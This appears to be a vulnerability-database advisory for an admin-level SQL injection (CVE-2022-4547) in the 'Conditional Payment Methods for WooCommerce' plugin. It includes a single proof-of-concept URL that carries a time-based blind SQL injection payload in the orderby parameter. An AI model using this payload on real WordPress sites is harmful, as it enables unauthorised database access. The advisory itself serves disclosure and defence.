Lucene search
Daniel KrohmerWPEX-ID:FE1514B4-74E1-4C19-8741-C0D4DB9BAB99HistoryDec 24, 2022 - 12:00 a.m.
Conditional Payment Methods for WooCommerce <= 1.0 - Admin+ SQLi
2022-12-2400:00:00
Daniel Krohmer
133
woocommerce
conditional payment
admin
sqli
security vulnerability
exploit
EPSS
0.001
Percentile
44.8%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by [high privilege users such as admin|users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=wcpma-payment-settings&action=wcpma_view_list&orderby=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)Related
cve
cve
CVE-2022-4547
2023-01-16 16:15:13
prion
prion
Sql injection
2023-01-16 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-4547
2023-01-16 16:15:13
wpvulndb
wpvulndb
Conditional Payment Methods for WooCommerce <= 1.0 - Admin+ SQLi
2022-12-24 00:00:00